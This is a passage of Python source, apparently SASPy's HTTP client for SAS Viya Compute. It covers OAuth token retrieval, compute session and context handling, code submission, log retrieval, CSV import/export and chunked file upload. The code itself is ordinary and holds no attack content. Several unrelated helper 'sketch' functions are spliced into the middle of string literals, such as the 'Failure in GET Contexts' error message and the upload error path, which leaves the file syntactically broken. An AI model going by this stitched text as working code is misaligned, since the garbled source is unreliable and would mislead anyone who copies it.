(\"grant_type=password&username=\"+uuser+\"&password=\"+upw).encode(self.encoding)\n client = \"Basic \"+base64.encodebytes(\"sas.tkmtrb:\".encode(self.encoding)).splitlines()[0].decode(self.encoding)\n #client = \"Basic \"+base64.encodebytes((client_id+\":\").encode(self.encoding)).splitlines()[0].decode(self.encoding)\n headers = {\"Accept\":\"application/vnd.sas.compute.session+json\",\"Content-Type\":\"application/x-www-form-urlencoded\",\n \"Authorization\":client}\n\n # POST AuthToken\n conn = self.HTTPConn; conn.connect()\n try:\n conn.request('POST', \"/SASLogon/oauth/token\", body=d1, headers=headers)\n req = conn.getresponse()\n except:\n #print(\"Failure in GET AuthToken. Could not connect to the logon service. Exception info:\\n\"+str(sys.exc_info()))\n msg=\"Failure in GET AuthToken. Could not connect to the logon service. Exception info:\\n\"+str(sys.exc_info())\n raise SASHTTPauthenticateError(msg)\n #return None\n\n status = req.status\n resp = req.read()\n conn.close()\n\n if status > 299:\n #print(\"Failure in GET AuthToken. Status=\"+str(status)+\"\\nResponse=\"+resp.decode(self.encoding))\n msg=\"Failure in GET AuthToken. Status=\"+str(status)+\"\\nResponse=\"+str(resp)\n raise SASHTTPauthenticateError(msg)\n #return None\n\n js = json.loads(resp.decode(self.encoding))\n token = js.get('access_token')\n return token\n\n def _get_contexts(self):\n #import pdb; pdb.set_trace()\n\n # GET Contexts\n conn = self.HTTPConn; conn.connect()\n headers={\"Accept\":\"application/vnd.sas.collection+json\",\n \"Accept-Item\":\"application/vnd.sas.compute.context.summary+json\",\n \"Authorization\":\"Bearer \"+self._token}\n conn.request('GET', \"/compute/contexts?limit=999999\", headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n if status > 299:\n fmsg = \"Failure in GET Contexts. 
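# Trimmed sketch of the password-grant request made by _authenticate() above:
# form-encode the credentials, send a Basic client header, POST to
# /SASLogon/oauth/token and read access_token from the JSON reply.  host,
# user and pw are placeholders; the "sas.tkmtrb" client id is the one
# hard-coded in the method above.  The authorization_code and jwt-bearer
# grants follow the same shape with a different body.
import base64
import json
import http.client as hc
from urllib.parse import quote

def password_grant_token(host, user, pw, port=443):
    body = 'grant_type=password&username=%s&password=%s' % (quote(user), quote(pw))
    client = 'Basic ' + base64.b64encode(b'sas.tkmtrb:').decode('ascii')
    headers = {'Content-Type': 'application/x-www-form-urlencoded',
               'Accept': 'application/vnd.sas.compute.session+json',
               'Authorization': client}
    conn = hc.HTTPSConnection(host, port)
    conn.request('POST', '/SASLogon/oauth/token', body=body.encode(), headers=headers)
    resp = conn.getresponse()
    payload = json.loads(resp.read().decode())
    conn.close()
    return payload.get('access_token')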
Status=\"+str(status)+\"\\nResponse=\"+resp.decode(self.encoding)\n raise SASHTTPconnectionError(msg=fmsg)\n\n js = json.loads(resp.decode(self.encoding))\n contexts = js.get('items')\n\n return contexts\n\n def _create_context(self, user):\n # GET Contexts\n conn = self.HTTPConn; conn.connect()\n d1 = '{\"name\": \"SASPy\",\"version\": 1,\"description\": \"SASPy Context\",\"attributes\": {\"sessionInactiveTimeout\": 60 },'\n d1 += '\"launchContext\": {\"contextName\": \"'+self.ctxname+'\"},\"launchType\": \"service\",\"authorizedUsers\": [\"'+user+'\"]}'\n\n headers={\"Accept\":\"application/vnd.sas.compute.context+json\",\n \"Content-Type\":\"application/vnd.sas.compute.context.request+json\",\n \"Authorization\":\"Bearer \"+self._token}\n conn.request('POST', \"/compute/contexts\", body=d1, headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n if status > 299:\n logger.error(\"Failure in POST Context. Status=\"+str(status)+\"\\nResponse=\"+resp.decode(self.encoding))\n return None\n\n contexts = self._get_contexts()\n return contexts\n\n\nclass SASsessionHTTP():\n '''\n The SASsession object is the main object to instantiate and provides access to the rest of the functionality.\n cfgname - value in SAS_config_names List of the sascfg.py file\n kernel - None - internal use when running the SAS_kernel notebook\n user - userid to use to connect to Compute Service\n pw - pw for the userid being used to connect to Compute Service\n ip - overrides IP Dict entry of cfgname in sascfg.py file\n port - overrides Port Dict entry of cfgname in sascfg.py file\n context - overrides Context Dict entry of cfgname in sascfg.py file\n options - overrides Options Dict entry of cfgname in sascfg.py file\n encoding - This is the python encoding value that matches the SAS session encoding of the Compute Server you are connecting to\n '''\n #def __init__(self, cfgname: str ='', kernel: '<SAS_kernel object>' =None, user: str ='', pw: str ='',\n # ip: str ='', port: int ='', context: str ='', options: list =[]) -> '<SASsession object>':\n def __init__(self, **kwargs):\n self.pid = None\n self._session = None\n self._sb = kwargs.get('sb', None)\n self._log = \"\\nNo SAS session established, something must have failed trying to connect\\n\"\n self.sascfg = SASconfigHTTP(self, **kwargs)\n\n if self.sascfg._token:\n self._startsas()\n else:\n None\n\n def __del__(self):\n if self._session:\n self._endsas()\n self._sb.SASpid = None\n return\n\n def _startsas(self):\n if self.pid:\n return self.pid\n\n if len(self.sascfg.options):\n options = '[';\n for opt in self.sascfg.options:\n options += '\"'+opt+'\", '\n options = (options.rpartition(','))[0]+']'\n else:\n options = '[]'\n\n # POST Session\n uri = None\n for ld in self.sascfg.ctx.get('links'):\n if ld.get('method') == 'POST':\n uri = ld.get('uri')\n break\n\n if not uri:\n raise SASHTTPconnectionError(msg=\n \"POST uri not found in context info. 
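# Tiny sketch of the (method, rel) -> uri lookup that the code above performs
# inline on each 'links' list returned by the Compute service.
def find_link(links, method, rel):
    for ld in links or []:
        if ld.get('method') == method and ld.get('rel') == rel:
            return ld.get('uri')
    return None

# illustrative usage: find_link(session.get('links'), 'POST', 'execute')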
You may not have permission to use this context.\\n{}\".format(self.sascfg.ctx))\n\n conn = self.sascfg.HTTPConn; conn.connect()\n d1 = '{\"name\":\"'+self.sascfg.ctxname+'\", \"description\":\"saspy session\", \"version\":1, \"environment\":{\"options\":'+options+'}'\n d1 += ',\"attributes\": {\"sessionInactiveTimeout\": '+str(int(float(self.sascfg.inactive)*60))+'}}'\n headers={\"Accept\":\"application/vnd.sas.compute.session+json\",\"Content-Type\":\"application/vnd.sas.compute.session.request+json\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n\n try:\n conn.request('POST', uri, body=d1, headers=headers)\n req = conn.getresponse()\n except:\n #print(\"Could not acquire a SAS Session for context: \"+self.sascfg.ctxname)\n raise SASHTTPconnectionError(msg=\"Could not acquire a SAS Session for context: \"+self.sascfg.ctxname+\". Exception info:\\n\"+str(sys.exc_info()))\n #return None\n\n status = req.status\n resp = req.read()\n conn.close()\n\n if status > 299:\n #print(\"Failure in POST Session \\n\"+resp.decode(self.sascfg.encoding))\n #print(\"Could not acquire a SAS Session for context: \"+self.sascfg.ctxname)\n msg=\"Could not acquire a SAS Session for context: \"+self.sascfg.ctxname+\". Exception info:\\nStatus=\"+str(status)+\"\\nResponse=\"+str(resp)\n raise SASHTTPconnectionError(msg)\n #return None\n\n self._session = json.loads(resp.decode(self.sascfg.encoding))\n\n if self._session == None:\n logger.error(\"Could not acquire a SAS Session for context: \"+self.sascfg.ctxname)\n return None\n\n #GET Session uri's once\n for ld in self._session.get('links'):\n if ld.get('method') == 'GET' and ld.get('rel') == 'log':\n self._uri_log = ld.get('uri')\n elif ld.get('method') == 'GET' and ld.get('rel') == 'listing':\n self._uri_lst = ld.get('uri')\n elif ld.get('method') == 'GET' and ld.get('rel') == 'results':\n self._uri_ods = ld.get('uri')\n elif ld.get('method') == 'GET' and ld.get('rel') == 'state':\n self._uri_state = ld.get('uri')\n elif ld.get('method') == 'POST' and ld.get('rel') == 'execute':\n self._uri_exe = ld.get('uri')\n elif ld.get('method') == 'PUT' and ld.get('rel') == 'cancel':\n self._uri_can = ld.get('uri')\n elif ld.get('method') == 'DELETE' and ld.get('rel') == 'delete':\n self._uri_del = ld.get('uri')\n elif ld.get('method') == 'GET' and ld.get('rel') == 'files':\n self._uri_files = ld.get('uri')\n\n self.pid = self._session.get('id')\n\n self._log = self._getlog()\n\n # POST Job - Lets see if the server really came up, cuz you can't tell from what happend so far\n conn = self.sascfg.HTTPConn; conn.connect()\n jcode = json.dumps('\\n')\n d1 = '{\"code\":['+jcode+']}'\n headers={\"Accept\":\"application/json\",\"Content-Type\":\"application/vnd.sas.compute.job.request+json\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('POST', self._uri_exe, body=d1, headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n try:\n jobid = json.loads(resp.decode(self.sascfg.encoding))\n except:\n jobid = None\n\n if not jobid or status > 299:\n logger.error(\"Compute server had issues starting:\\n\")\n for key in jobid:\n logger.error(key+\"=\"+str(jobid.get(key)))\n return None\n\n self._sb.SESSION_ID = self.pid\n ll = self.submit(\"options svgtitle='svgtitle'; options validvarname=any validmemname=extend pagesize=max nosyntaxcheck; ods graphics on;\", \"text\")\n if self.sascfg.verbose:\n logger.info(\"SAS server started using Context \"+self.sascfg.ctxname+\" with SESSION_ID=\"+self.pid)\n\n 
return self.pid\n\n def _endsas(self):\n rc = 0\n if self._session:\n # DELETE Session\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"application/json\",\"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('DELETE', self._uri_del, headers=headers)\n req = conn.getresponse()\n resp = req.read()\n conn.close()\n\n if self.sascfg.verbose:\n logger.info(\"SAS server terminated for SESSION_ID=\"+self._session.get('id'))\n self._session = None\n self.pid = None\n self._sb.SASpid = None\n return rc\n\n\n def _getlog(self, jobid=None):\n start = 0\n logr = ''\n\n # GET Log\n if jobid:\n for ld in jobid.get('links'):\n if ld.get('method') == 'GET' and ld.get('rel') == 'log':\n uri = ld.get('uri')\n break\n else:\n uri = self._uri_log\n\n while True:\n # GET Log\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"application/vnd.sas.collection+json\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('GET', uri+\"?start=\"+str(start)+\"&limit=\"+str(start+1000), headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n try:\n js = json.loads(resp.decode(self.sascfg.encoding))\n log = js.get('items')\n lines = len(log)\n except:\n lines = None\n\n if not lines:\n break\n start += lines\n\n for line in log:\n logr += line.get('line')+'\\n'\n\n if jobid != None:\n self._log += logr.replace(chr(12), chr(10))\n\n if logr.count('ERROR:') > 0:\n warnings.warn(\"Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem\")\n self._sb.check_error_log = True\n\n return logr\n\n def _getlst(self, jobid=None):\n htm = ''\n i = 0\n\n # GET the list of results\n if jobid:\n for ld in jobid.get('links'):\n if ld.get('method') == 'GET' and ld.get('rel') == 'results':\n uri = ld.get('uri')+\"?includeTypes=ODS\"\n break\n else:\n uri = self._uri_lst\n\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"application/vnd.sas.collection+json\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('GET', uri, headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n try:\n js = json.loads(resp.decode(self.sascfg.encoding))\n results = js.get('items')\n if not results:\n results = []\n except:\n results = []\n\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"application/vnd.sas.collection+json\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n while i < len(results):\n # GET an ODS Result\n if results[i].get('type') == 'ODS' and len(results[i].get('links')) > 0:\n conn.request('GET', results[i].get('links')[0].get('href'), headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n htm += resp.decode(self.sascfg.encoding)\n i += 1\n conn.close()\n\n lstd = htm.replace(chr(12), chr(10)).replace('<body class=\"c body\">',\n '<body class=\"l body\">').replace(\"font-size: x-small;\",\n \"font-size: normal;\")\n return lstd\n\n def _getlsttxt(self, jobid=None):\n start = 0\n lstr = ''\n\n # GET Log\n if jobid:\n for ld in jobid.get('links'):\n if ld.get('method') == 'GET' and ld.get('rel') == 'listing':\n uri = ld.get('uri')\n break\n else:\n uri = self._uri_lst\n\n while True:\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"application/vnd.sas.collection+json\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('GET', uri+\"?start=\"+str(start)+\"&limit=\"+str(start+1000), headers=headers)\n req = conn.getresponse()\n status = 
req.status\n resp = req.read()\n conn.close()\n\n try:\n js = json.loads(resp.decode(self.sascfg.encoding))\n lst = js.get('items')\n lines = len(lst)\n except:\n lines = None\n\n if not lines:\n break\n start += lines\n\n for line in lst:\n lstr += line.get('line')+'\\n'\n\n return lstr\n\n def _asubmit(self, code, results=\"html\"):\n #odsopen = json.dumps(\"ods listing close;ods html5 (id=saspy_internal) options(bitmap_mode='inline') device=png; ods graphics on / outputfmt=png;\\n\")\n #odsopen = json.dumps(\"ods listing close;ods html5 (id=saspy_internal) options(bitmap_mode='inline') device=svg; ods graphics on / outputfmt=png;\\n\")\n #odsclose = json.dumps(\"ods html5 (id=saspy_internal) close;ods listing;\\n\")\n odsopen = json.dumps(\"ods listing close;ods \"+self.sascfg.output+\" (id=saspy_internal) options(bitmap_mode='inline') device=svg style=\"+self._sb.HTML_Style+\"; ods graphics on / outputfmt=png;\\n\")\n odsclose = json.dumps(\"ods \"+self.sascfg.output+\" (id=saspy_internal) close;ods listing;\\n\")\n ods = True;\n\n if results.upper() != \"HTML\":\n ods = False\n odsopen = '\"\"'\n odsclose = '\"\"'\n\n # POST Job\n conn = self.sascfg.HTTPConn; conn.connect()\n jcode = json.dumps(code)\n d1 = '{\"code\":['+odsopen+','+jcode+','+odsclose+']}'\n headers={\"Accept\":\"application/json\",\"Content-Type\":\"application/vnd.sas.compute.job.request+json\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('POST', self._uri_exe, body=d1, headers=headers)\n req = conn.getresponse()\n resp = req.read()\n conn.close()\n\n jobid = json.loads(resp.decode(self.sascfg.encoding))\n\n return jobid\n\n def _jobstate(self, jobid):\n\n uri = None\n for ld in jobid.get('links'):\n if ld.get('method') == 'GET' and ld.get('rel') == 'state':\n uri = ld.get('uri')\n break\n\n if not uri:\n print(\"No job found\")\n return None\n\n conn = self.sascfg.HTTPConn;\n headers = {\"Accept\":\"text/plain\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.connect()\n conn.request('GET', uri, headers=headers)\n req = conn.getresponse()\n resp = req.read()\n conn.close()\n\n return resp\n\n\n def submit(self, code: str, results: str =\"html\", prompt: dict = None, **kwargs) -> dict:\n '''\n code - the SAS statements you want to execute\n results - format of results, HTML is default, TEXT is the alternative\n prompt - dict of names:flags to prompt for; create marco variables (used in submitted code), then keep or delete\n The keys are the names of the macro variables and the boolean flag is to either hide what you type and delete\n the macros, or show what you type and keep the macros (they will still be available later)\n for example (what you type for pw will not be displayed, user and dsname will):\n\n results = sas.submit(\n \"\"\"\n libname tera teradata server=teracop1 user=&user pw=&pw;\n proc print data=tera.&dsname (obs=10); run;\n \"\"\" ,\n prompt = {'user': False, 'pw': True, 'dsname': False}\n )\n\n Returns - a Dict containing two keys:values, [LOG, LST]. 
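# Compact sketch of the job-request body assembled by _asubmit()/submit()
# above: the user's code is wrapped in ODS open/close statements and shipped
# as {"code": [odsopen, code, odsclose]}.  The 'HTMLBlue' style default here
# is only an assumed placeholder for self._sb.HTML_Style.
import json

def build_job_body(code, results='html', style='HTMLBlue', output='html5'):
    if results.upper() == 'HTML':
        odsopen = json.dumps("ods listing close;ods " + output +
                             " (id=saspy_internal) options(bitmap_mode='inline')"
                             " device=svg style=" + style +
                             "; ods graphics on / outputfmt=png;\n")
        odsclose = json.dumps("ods " + output + " (id=saspy_internal) close;ods listing;\n")
    else:
        odsopen = odsclose = '""'
    return '{"code":[' + odsopen + ',' + json.dumps(code) + ',' + odsclose + ']}'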
LOG is text and LST is 'results' (HTML or TEXT)\n\n NOTE: to view HTML results in the ipykernel, issue: from IPython.display import HTML and use HTML() instead of print()\n i.e,: results = sas.submit(\"data a; x=1; run; proc print;run')\n print(results['LOG'])\n HTML(results['LST'])\n '''\n prompt = prompt if prompt is not None else {}\n printto = kwargs.pop('undo', False)\n\n #odsopen = json.dumps(\"ods listing close;ods html5 (id=saspy_internal) options(bitmap_mode='inline') device=png; ods graphics on / outputfmt=png;\\n\")\n #odsopen = json.dumps(\"ods listing close;ods html5 (id=saspy_internal) options(bitmap_mode='inline') device=svg; ods graphics on / outputfmt=png;\\n\")\n #odsclose = json.dumps(\"ods html5 (id=saspy_internal) close;ods listing;\\n\")\n odsopen = json.dumps(\"ods listing close;ods \"+self.sascfg.output+\" (id=saspy_internal) options(bitmap_mode='inline') device=svg style=\"+self._sb.HTML_Style+\"; ods graphics on / outputfmt=png;\\n\")\n odsclose = json.dumps(\"ods \"+self.sascfg.output+\" (id=saspy_internal) close;ods listing;\\n\")\n ods = True;\n pcodei = ''\n pcodeiv = ''\n pcodeo = ''\n\n if self._session == None:\n logger.error(\"No SAS process attached. SAS process has terminated unexpectedly.\")\n return dict(LOG=\"No SAS process attached. SAS process has terminated unexpectedly.\", LST='')\n\n if results.upper() != \"HTML\":\n ods = False\n odsopen = '\"\"'\n odsclose = '\"\"'\n\n if len(prompt):\n pcodei += 'options nosource nonotes;\\n'\n pcodeo += 'options nosource nonotes;\\n'\n for key in prompt:\n gotit = False\n while not gotit:\n var = self.sascfg._prompt('Please enter value for macro variable '+key+' ', pw=prompt[key])\n if var is None:\n raise RuntimeError(\"No value for prompted macro variable provided.\")\n if len(var) > 0:\n gotit = True\n else:\n print(\"Sorry, didn't get a value for that variable.\")\n if prompt[key]:\n pcodei += '%let '+key+'='+var+';\\n'\n else:\n pcodeiv += '%let '+key+'='+var+';\\n'\n if prompt[key]:\n pcodeo += '%symdel '+key+';\\n'\n pcodei += 'options source notes;\\n'\n pcodeo += 'options source notes;\\n'\n\n # POST Job\n conn = self.sascfg.HTTPConn; conn.connect()\n jcode = json.dumps(pcodei+pcodeiv+code+'\\n'+pcodeo)\n d1 = '{\"code\":['+odsopen+','+jcode+','+odsclose+']}'\n headers={\"Accept\":\"application/json\",\"Content-Type\":\"application/vnd.sas.compute.job.request+json\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('POST', self._uri_exe, body=d1, headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n try:\n jobid = json.loads(resp.decode(self.sascfg.encoding))\n except:\n raise SASHTTPsubmissionError(msg=\"Problem parsing response from Compute Service.\\n Status=\"+str(status)+\"\\n Response=\"+str(resp))\n\n if not jobid or status > 299:\n raise SASHTTPsubmissionError(msg=\"Problem submitting job to Compute Service.\\n Status code=\"+str(jobid.get('httpStatusCode'))+\"\\n Message=\"+jobid.get('message'))\n\n for ld in jobid.get('links'):\n if ld.get('method') == 'GET' and ld.get('rel') == 'state':\n uri = ld.get('uri')\n break\n\n conn = self.sascfg.HTTPConn;\n headers = {\"Accept\":\"text/plain\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n done = False\n\n delay = kwargs.get('GETstatusDelay' , 0)\n excpcnt = kwargs.get('GETstatusFailcnt', 5)\n\n while not done:\n try:\n while True:\n # GET Status for JOB\n conn.connect()\n conn.request('GET', uri, headers=headers)\n req = conn.getresponse()\n resp = req.read()\n 
conn.close()\n if resp not in [b'running', b'pending']:\n done = True\n break\n sleep(delay)\n\n except (KeyboardInterrupt, SystemExit):\n conn.close()\n print('Exception caught!')\n response = self.sascfg._prompt(\n \"SAS attention handling not yet supported over HTTP. Please enter (Q) to Quit waiting for results or (C) to continue waiting.\")\n while True:\n if response is None or response.upper() == 'Q':\n return dict(LOG='', LST='', BC=True)\n if response.upper() == 'C':\n break\n response = self.sascfg._prompt(\"Please enter (Q) to Quit waiting for results or (C) to continue waiting.\")\n\n except hc.RemoteDisconnected as Dis:\n conn.close()\n print('RemoteDisconnected Exception caught!\\n'+str(Dis))\n excpcnt -= 1\n if excpcnt < 0:\n raise\n\n logd = self._getlog(jobid).replace(chr(12), chr(10))\n\n if ods:\n lstd = self._getlst(jobid).replace(chr(12), chr(10))\n else:\n lstd = self._getlsttxt(jobid).replace(chr(12), chr(10))\n\n trip = lstd.rpartition(\"/*]]>*/\")\n if len(trip[1]) > 0 and len(trip[2]) < 200:\n lstd = ''\n\n self._sb._lastlog = logd\n\n # issue 294\n if printto:\n conn = self.sascfg.HTTPConn; conn.connect()\n jcode = json.dumps('proc printto;run;\\n')\n d1 = '{\"code\":['+jcode+']}'\n headers={\"Accept\":\"application/json\",\"Content-Type\":\"application/vnd.sas.compute.job.request+json\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('POST', self._uri_exe, body=d1, headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n if logd.count('ERROR:') > 0:\n warnings.warn(\"Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem\")\n self._sb.check_error_log = True\n\n return dict(LOG=logd, LST=lstd)\n\n def saslog(self):\n '''\n this method is used to get the current, full contents of the SASLOG\n '''\n return self._log\n\n def exist(self, table: str, libref: str =\"\") -> bool:\n '''\n table - the name of the SAS Data Set\n libref - the libref for the Data Set, defaults to WORK, or USER if assigned\n\n Returns True it the Data Set exists and False if it does not\n '''\n #can't have an empty libref, so check for user or work\n sd = table.strip().replace(\"'\", \"''\")\n if not libref:\n # HEAD Libref USER\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"*/*\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('HEAD', \"/compute/sessions/\"+self.pid+\"/data/USER\", headers=headers)\n req = conn.getresponse()\n status = req.status\n conn.close()\n\n if status == 200:\n libref = 'USER'\n else:\n libref = 'WORK'\n\n code = 'data _null_; e = exist(\"'\n code += libref+\".\"\n code += \"'\"+sd+\"'n\"+'\"'+\");\\n\"\n code += 'v = exist(\"'\n code += libref+\".\"\n code += \"'\"+sd+\"'n\"+'\"'+\", 'VIEW');\\n if e or v then e = 1;\\n\"\n code += \"te='TABLE_EXISTS='; put te e;run;\\n\"\n\n ll = self.submit(code, \"text\")\n\n l2 = ll['LOG'].rpartition(\"TABLE_EXISTS= \")\n l2 = l2[2].partition(\"\\n\")\n exists = int(l2[0])\n\n return bool(exists)\n\n \"\"\"\n # HEAD Data Table\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"*/*\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('HEAD', \"/compute/sessions/\"+self.pid+\"/data/\"+libref+\"/\"+table, headers=headers)\n req = conn.getresponse()\n status = req.status\n conn.close()\n\n if status == 200:\n exists = True\n else:\n exists = False\n\n return exists\n \"\"\"\n\n def read_csv(self, file: str, table: str, libref: str =\"\", nosub: bool=False, opts: dict 
={}) -> '<SASdata object>':\n '''\n This method will import a csv file into a SAS Data Set and return the SASdata object referring to it.\n file - eithe the OS filesystem path of the file, or HTTP://... for a url accessible file\n table - the name of the SAS Data Set to create\n libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned\n opts - a dictionary containing any of the following Proc Import options(datarow, delimiter, getnames, guessingrows)\n '''\n code = \"filename x \"\n\n if file.lower().startswith(\"http\"):\n code += \"url \"\n\n code += \"\\\"\"+file+\"\\\";\\n\"\n code += \"proc import datafile=x out=\"\n if len(libref):\n code += libref+\".\"\n code += \"'\"+table.strip().replace(\"'\", \"''\")+\"'n dbms=csv replace; \"+self._sb._impopts(opts)+\" run;\"\n\n if nosub:\n print(code)\n else:\n ll = self.submit(code, \"text\")\n\n def write_csv(self, file: str, table: str, libref: str =\"\", nosub: bool =False, dsopts: dict ={}, opts: dict ={}) -> 'The LOG showing the results of the step':\n '''\n This method will export a SAS Data Set to a file in CCSV format.\n file - the OS filesystem path of the file to be created (exported from the SAS Data Set)\n table - the name of the SAS Data Set you want to export to a CSV file\n libref - the libref for the SAS Data Set.\n opts - a dictionary containing any of the following Proc Export options(delimiter, putnames)\n '''\n code = \"filename x \\\"\"+file+\"\\\";\\n\"\n code += \"options nosource;\\n\"\n code += \"proc export data=\"\n\n if len(libref):\n code += libref+\".\"\n\n code += \"'\"+table.strip().replace(\"'\", \"''\")+\"'n \"+self._sb._dsopts(dsopts)+\" outfile=x dbms=csv replace; \"\n code += self._sb._expopts(opts)+\" run\\n;\"\n code += \"options source;\\n\"\n\n if nosub:\n print(code)\n else:\n ll = self.submit(code, \"text\")\n return ll['LOG']\n\n def upload(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):\n \"\"\"\n This method uploads a local file to the SAS servers file system.\n localfile - path to the local file to upload\n remotefile - path to remote file to create or overwrite\n overwrite - overwrite the output file if it exists?\n permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax\n \"\"\"\n valid = self._sb.file_info(remotefile, quiet = True)\n\n if valid is None:\n remf = remotefile\n else:\n if valid == {}:\n remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]\n else:\n remf = remotefile\n if overwrite == False:\n return {'Success' : False,\n 'LOG' : \"File \"+str(remotefile)+\" exists and overwrite was set to False. Upload was stopped.\"}\n\n try:\n fd = open(localfile, 'rb')\n except OSError as e:\n return {'Success' : False,\n 'LOG' : \"File \"+str(localfile)+\" could not be opened. 
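# Stripped-down sketch of the PROC IMPORT code generated by read_csv() above
# (the proc-import options handled by _impopts are omitted).  The usage line
# at the end is purely illustrative.
def csv_import_code(file, table, libref=''):
    code = 'filename x '
    if file.lower().startswith('http'):
        code += 'url '   # remote files go through FILENAME URL
    code += '"' + file + '";\n'
    code += 'proc import datafile=x out='
    if libref:
        code += libref + '.'
    code += "'" + table.strip().replace("'", "''") + "'n dbms=csv replace; run;"
    return code

# illustrative usage: csv_import_code('https://example.com/cars.csv', 'cars', 'work')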
Error was: \"+str(e)}\n\n fsize = os.path.getsize(localfile)\n\n if fsize > 0:\n code = \"filename _sp_updn '\"+remf+\"' recfm=N permission='\"+permission+\"';\"\n ll = self.submit(code, 'text')\n logf = ll['LOG']\n\n # GET Etag\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"application/vnd.sas.compute.fileref+json;application/json\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('GET', self._uri_files+\"/_sp_updn\", headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n Etag = req.getheader(\"Etag\")\n\n # PUT data\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"*/*\",\"Content-Type\":\"application/octet-stream\",\n \"Transfer-Encoding\" : \"chunked\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n\n conn.connect()\n conn.putrequest('PUT', self._uri_files+\"/_sp_updn/content\")\n conn.putheader(\"Accept\",\"*/*\")\n conn.putheader(\"Content-Type\",\"application/octet-stream\")\n conn.putheader(\"If-Match\",Etag)\n conn.putheader(\"Transfer-Encoding\",\"chunked\")\n conn.putheader(\"Authorization\",\"Bearer \"+self.sascfg._token)\n conn.endheaders()\n\n blksz = int(kwargs.get('blocksize', 50000))\n while True:\n buf = fd.read1(blksz)\n if len(buf) == 0:\n conn.send(b\"0\\r\\n\\r\\n\")\n break\n\n lenstr = \"%s\\r\\n\" % hex(len(buf))[2:]\n conn.send(lenstr.encode())\n conn.send(buf)\n conn.send(b\"\\r\\n\")\n\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n code = \"filename _sp_updn;\"\n else:\n logf = ''\n code = \"\"\"\n filename _sp_updn '\"\"\"+remf+\"\"\"' recfm=F encoding=binary lrecl=1 permission='\"\"\"+permission+\"\"\"';\n data _null_;\n fid = fopen('_sp_updn', 'O');\n if fid then\n rc = fclose(fid);\n run;\n filename _sp_updn;\n \"\"\"\n\n ll = self.submit(code, 'text')\n logf += ll['LOG']\n fd.close()\n\n return {'Success' : True,\n 'LOG' : logf}\n\n def download(self, localfile: str, remotefile: str, overwrite: bool = True, **kwargs):\n \"\"\"\n This method downloads a remote file from the SAS servers file system.\n localfile - path to the local file to create or overwrite\n remotefile - path to remote file tp dpwnload\n overwrite - overwrite the output file if it exists?\n \"\"\"\n valid = self._sb.file_info(remotefile, quiet = True)\n\n if valid is None:\n return {'Success' : False,\n 'LOG' : \"File \"+str(remotefile)+\" does not exist.\"}\n\n if valid == {}:\n return {'Success' : False,\n 'LOG' : \"File \"+str(remotefile)+\" is a directory.\"}\n\n if os.path.isdir(localfile):\n locf = localfile + os.sep + remotefile.rpartition(self._sb.hostsep)[2]\n else:\n locf = localfile\n\n try:\n fd = open(locf, 'wb')\n fd.write(b'write can fail even if open worked, as it turns out')\n fd.close()\n fd = open(locf, 'wb')\n except OSError as e:\n return {'Success' : False,\n 'LOG' : \"File \"+str(locf)+\" could not be opened or written to. 
